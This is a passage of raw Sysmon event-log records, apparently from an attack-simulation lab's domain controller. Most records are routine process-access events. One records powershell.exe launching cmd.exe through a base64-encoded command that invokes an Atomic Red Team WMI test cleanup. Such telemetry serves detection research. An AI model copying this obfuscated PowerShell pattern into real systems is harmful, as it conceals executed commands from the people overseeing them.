C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.409","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5728,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.409\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.409","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5729,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.409\r\nSourceProcessGUID: {41C8662E-20D8-5F25-0000-001089080900}\r\nSourceProcessId: 1052\r\nSourceThreadId: 4312\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-001085C60600}\r\nTargetProcessId: 4168\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1F3FFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFD15601843)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.409","SourceProcessGUID":"{41C8662E-20D8-5F25-0000-001089080900}","SourceProcessId":"1052","SourceThreadId":"4312","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-001085C60600}","TargetProcessId":"4168","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1f3fff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFD15601843)","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5730,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.409\r\nSourceProcessGUID: {41C8662E-20D7-5F25-0000-00105BE20800}\r\nSourceProcessId: 1592\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-001085C60600}\r\nTargetProcessId: 4168\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.409","SourceProcessGUID":"{41C8662E-20D7-5F25-0000-00105BE20800}","SourceProcessId":"1592","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-001085C60600}","TargetProcessId":"4168","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5731,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.423\r\nProcessGuid: {41C8662E-20D9-5F25-0000-0010BE2D0900}\r\nProcessId: 4328\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"\" \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20D7-5F25-0000-0020ADE10800}\r\nLogonId: 0x8E1AD\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-20D8-5F25-0000-001089080900}\r\nParentProcessId: 1052\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.423","ProcessGuid":"{41C8662E-20D9-5F25-0000-0010BE2D0900}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"\" ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20D7-5F25-0000-0020ADE10800}","LogonId":"0x8e1ad","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-20D8-5F25-0000-001089080900}","ParentProcessId":"1052","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5732,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.409\r\nSourceProcessGUID: {41C8662E-20D8-5F25-0000-001089080900}\r\nSourceProcessId: 1052\r\nSourceThreadId: 4312\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-0010BE2D0900}\r\nTargetProcessId: 4328\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|UNKNOWN(00007FFD66A63638)|UNKNOWN(00007FFD66A634AC)|UNKNOWN(00007FFD66AE5CD8)|UNKNOWN(00007FFD66A5C094)|UNKNOWN(00007FFD67515037)|UNKNOWN(00007FFD66A2488C)|UNKNOWN(00007FFD66A82D5B)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A66251)|UNKNOWN(00007FFD66A581D6)|UNKNOWN(00007FFD66A91366)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.409","SourceProcessGUID":"{41C8662E-20D8-5F25-0000-001089080900}","SourceProcessId":"1052","SourceThreadId":"4312","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-0010BE2D0900}","TargetProcessId":"4328","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|UNKNOWN(00007FFD66A63638)|UNKNOWN(00007FFD66A634AC)|UNKNOWN(00007FFD66AE5CD8)|UNKNOWN(00007FFD66A5C094)|UNKNOWN(00007FFD67515037)|UNKNOWN(00007FFD66A2488C)|UNKNOWN(00007FFD66A82D5B)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A66251)|UNKNOWN(00007FFD66A581D6)|UNKNOWN(00007FFD66A91366)","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5733,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.409\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-0010BE2D0900}\r\nTargetProcessId: 4328\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.409","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-0010BE2D0900}","TargetProcessId":"4328","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5734,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.409\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.409","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5735,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.409\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 